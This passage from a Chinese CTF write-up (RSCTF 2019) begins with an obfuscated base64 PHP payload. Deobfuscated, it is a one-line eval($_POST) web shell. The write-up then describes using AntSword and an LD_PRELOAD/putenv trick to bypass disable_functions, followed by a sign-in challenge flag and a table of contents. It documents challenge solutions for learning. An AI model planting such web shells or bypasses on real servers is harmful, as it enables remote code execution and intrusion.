UHV0TnRhUEhFbVB5S3hHc0I1QnlFZ0JzNXNuSnRvR1B2MWJ5S2F0SG9tdDFBMkcxUkRMSUdpTEh5QkxVNTBCMmFydlBvR0JZdGRiMUVFdUo1dVBJRGpuQkNCbjJ4WEdZQ1NldXRWQ2h0aHVWTU9QeVBzdDFFdXZWS3hQUEVvb1BQakxKRVZMc2l0bnV0aUcwb1NtUFBOQllDb24wb2d1UEIxYnlQYUJ5RW50VUlmTHNSMFNKYmpSTnlQbkp0WFBZRWdDeVJQUFlJdFB1dElQY0lMdDF5UFNJeVBQc0RqR0phNENQSWFlVWFZdEI1ckd5UnV2dW5mTHM5c3BWTTRQQm91UDJQVnVzNVN0ZnhqTDFDV3ZVOTNRbTBrckxzN1FmND0iO2V2YWwoJz8+Jy4kQndsdHFPWWJIYVFrUlBOb3hjZm5GbXpzSWpoZE1EQVdVZUtHZ3ZpVnJKWnBMdVhFVFN5QygkaFlYbFRnQnFXQXBPYnhKdmVqUFJTZEhHUW5hdURpc2ZFTklGeW9jcmtVTHdtS01DdFZ6Wigkdk53VE9zS1BFQWxMY2lKREJoV3RSU0hYZW1wSXJqeVFVdUdvYWtuWUNkRnpxWk14ZmJnVigkTnZpdXl3Q2VQV0VHbGFjQW1manJnQk1UWVh6SFpwSXhEcVFuc1VLa2hvdEZTT1JkVkpMYiwkY2lNZlRYcFBvSkh6WkJ4TE92bmdqUUNiZElHa1lsVk5TdW1GckFVZVdhc0t5RXR3aERxUioyKSwkdk53VE9zS1BFQWxMY2lKREJoV3RSU0hYZW1wSXJqeVFVdUdvYWtuWUNkRnpxWk14ZmJnVigkTnZpdXl3Q2VQV0VHbGFjQW1manJnQk1UWVh6SFpwSXhEcVFuc1VLa2hvdEZTT1JkVkpMYiwkY2lNZlRYcFBvSkh6WkJ4TE92bmdqUUNiZElHa1lsVk5TdW1GckFVZVdhc0t5RXR3aERxUiwkY2lNZlRYcFBvSkh6WkJ4TE92bmdqUUNiZElHa1lsVk5TdW1GckFVZVdhc0t5RXR3aERxUiksJHZOd1RPc0tQRUFsTGNpSkRCaFd0UlNIWGVtcElyanlRVXVHb2FrbllDZEZ6cVpNeGZiZ1YoJE52aXV5d0NlUFdFR2xhY0FtZmpyZ0JNVFlYekhacEl4RHFRbnNVS2tob3RGU09SZFZKTGIsMCwkY2lNZlRYcFBvSkh6WkJ4TE92bmdqUUNiZElHa1lsVk5TdW1GckFVZVdhc0t5RXR3aERxUikpKSk7")); ?>

经过网站https://www.zhaoyuanma.com/phpjm.html解混淆,得到清晰的 php 文本

1
2
3
4
<?php
highlight_file(__FILE__);
@eval($_POST[ymlisisisiook]);
?>

我们用蚁剑连上去,发现只能访问/var/www/html/目录下的文件,其他都没有权限访问

使用蚁剑的绕过 disable_functions可以看到putenv函数没有被禁用

Image

直接使用LD_PRELOAD方法来绕过提权即可

Image

Flag:

1
动态靶机

签到题

车票拿好

Description:

Welcome to RSCTF! 各位小伙伴们,想上车请关注微信公众号: NEEPU Sec && 七色堇安全

Solution:

关注即可,发送 flag 或者关注直接给

Flag:

1
flag{N33pU@CcuT}

本文标题:【WriteUp】RSCTF 2019 题解

文章作者:binLep

发布时间:2019-10-28, 09:23:00

最后更新:2019-10-29, 12:29:18

原始链接:https://binlep.github.io/old_blog_01/2019/10/28/【WriteUp】RSCTF 2019 题解/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. REVERSE
    1. 1.1. pyc
      1. 1.1.1. Description:
      2. 1.1.2. Solution:
      3. 1.1.3. Flag:
    2. 1.2. Simple
      1. 1.2.1. Description:
      2. 1.2.2. Solution:
      3. 1.2.3. Flag:
    3. 1.3. WF
      1. 1.3.1. Description:
      2. 1.3.2. Solution:
      3. 1.3.3. Flag:
    4. 1.4. Simple2
      1. 1.4.1. Description:
      2. 1.4.2. Solution:
      3. 1.4.3. Flag:
    5. 1.5. Mobile
      1. 1.5.1. Description:
      2. 1.5.2. Solution:
      3. 1.5.3. Flag:
    6. 1.6. gogogo
      1. 1.6.1. Description:
      2. 1.6.2. Solution:
      3. 1.6.3. Flag:
  2. 2. PWN
    1. 2.1. veryeasypwn
      1. 2.1.1. Description:
      2. 2.1.2. Solution:
      3. 2.1.3. Flag:
    2. 2.2. pwn-1
      1. 2.2.1. Description:
      2. 2.2.2. Solution:
      3. 2.2.3. Flag:
    3. 2.3. pwn-2
      1. 2.3.1. Description:
      2. 2.3.2. Solution:
      3. 2.3.3. Flag:
    4. 2.4. Entry level pwn
      1. 2.4.1. Description:
      2. 2.4.2. Solution:
      3. 2.4.3. Flag:
    5. 2.5. pwn-3
      1. 2.5.1. Description:
      2. 2.5.2. Solution:
      3. 2.5.3. Flag:
    6. 2.6. pwn-4
      1. 2.6.1. Description:
      2. 2.6.2. Solution:
      3. 2.6.3. Flag:
  3. 3. MISC
    1. 3.1.
      1. 3.1.1. Description:
      2. 3.1.2. Solution:
      3. 3.1.3. Flag:
    2. 3.2. 佩奇!
      1. 3.2.1. Description:
      2. 3.2.2. Solution:
      3. 3.2.3. Flag:
    3. 3.3. 饿了么
      1. 3.3.1. Description:
      2. 3.3.2. Solution:
      3. 3.3.3. Flag:
    4. 3.4. beautiful girl
      1. 3.4.1. Description:
      2. 3.4.2. Solution:
      3. 3.4.3. Flag:
  4. 4. CRYPTO
    1. 4.1. 国学
      1. 4.1.1. Description:
      2. 4.1.2. Solution:
      3. 4.1.3. Flag:
    2. 4.2. XOR
      1. 4.2.1. Description:
      2. 4.2.2. Solution:
      3. 4.2.3. Flag:
    3. 4.3. Ez RSA
      1. 4.3.1. Description:
      2. 4.3.2. Solution:
      3. 4.3.3. Flag:
    4. 4.4. Alice is loney
      1. 4.4.1. Description:
      2. 4.4.2. Solution:
      3. 4.4.3. Flag:
  5. 5. WEB
    1. 5.1. bestlanguage
      1. 5.1.1. Description:
      2. 5.1.2. Solution:
      3. 5.1.3. Flag:
    2. 5.2. Ez Code
      1. 5.2.1. Description:
      2. 5.2.2. Solution:
      3. 5.2.3. Flag:
    3. 5.3. Getshell
      1. 5.3.1. Description:
      2. 5.3.2. Solution:
      3. 5.3.3. Flag:
  6. 6. 签到题
    1. 6.1. 车票拿好
      1. 6.1.1. Description:
      2. 6.1.2. Solution:
      3. 6.1.3. Flag:
|